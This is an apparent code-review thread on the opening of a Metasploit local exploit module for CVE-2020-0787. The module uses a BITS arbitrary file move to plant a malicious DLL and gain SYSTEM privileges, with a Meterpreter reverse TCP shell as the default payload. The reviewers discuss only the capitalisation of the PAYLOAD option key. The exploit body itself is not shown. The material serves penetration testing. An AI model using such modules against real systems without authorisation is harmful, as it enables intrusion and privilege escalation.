modules/exploits/windows/local/cve_2020_0787_bits_arbitrary_file_move.rb

```diff
@@ -0,0 +1,242 @@
+require 'msf/core/post/windows/priv'
+require 'msf/core/post/windows/registry'
+require 'msf/core/exploit/exe'
+require 'msf/core/post/windows/filesystem'
+require 'msf/core/exploit/file_dropper'
+require 'msf/core/post/file'
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::Common
+  include Msf::Post::Windows::Priv
+  include Msf::Exploit::EXE # Needed for generate_payload_dll
+  include Msf::Post::Windows::FileSystem
+  include Msf::Post::Windows::ReflectiveDLLInjection
+  include Msf::Exploit::FileDropper
+  include Msf::Post::File
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Background Intelligent Transfer Service Arbitrary File Move Privilege Elevation Vulnerability',
+        'Description' => %q{
+          This module exploits CVE-2020-0787, an arbitrary file move vulnerability in outdated versions of the
+          Background Intelligent Transfer Service (BITS), to overwrite C:\Windows\System32\WindowsCoreDeviceInfo.dll
+          with a malicious DLL containing the attacker's payload.
+
+          To achieve code execution as the SYSTEM user, the Update Session Orchestrator service is then started, which
+          will result in the malicious WindowsCoreDeviceInfo.dll being run with SYSTEM privileges due to a DLL hijacking
+          issue within the Update Session Orchestrator Service.
+
+          Note that presently this module only works on Windows 10 and later as the Update Session Orchestrator Service
+          was only introduced to Windows starting with Windows 10.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'itm4n', # PoC
+            'gwillcox-r7' # msf module
+          ],
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter'],
+        'Targets' =>
+          [
+            [ 'Windows DLL Dropper', { 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :windows_dropper } ],
+          ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => 'Mar 10 2020',
+        'References' =>
+          [
+            ['CVE', '2020-0787'],
+            ['URL', 'https://itm4n.github.io/cve-2020-0787-windows-bits-eop/'],
+            ['URL', 'https://github.com/itm4n/BitsArbitraryFileMove'],
+            # TO DO: UPDATE THIS WITH ATTACKERKB ASSESSMENT
+            # ['URL', '*TO UPDATE WITH ATTACKER KB ASSESSMENT'],
+            ['URL', 'https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html'],
+            ['URL', 'https://itm4n.github.io/usodllloader-part1/'],
+            ['URL', 'https://itm4n.github.io/usodllloader-part2/'],
+          ],
+        'Notes' =>
+          {
+            'SideEffects' => [ ARTIFACTS_ON_DISK ]
+          },
+        'DefaultOptions' =>
+          {
+            'DisablePayloadHandler' => false,
+            'EXITFUNC' => 'thread',
+            'Payload' => 'windows/x64/meterpreter/reverse_tcp',
```

Comment:
```suggestion
            'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
```

Reply:
Technically speaking either will work here, but I see your point, it should be PAYLOAD. Will fix this up now :)

Reply:
Correct.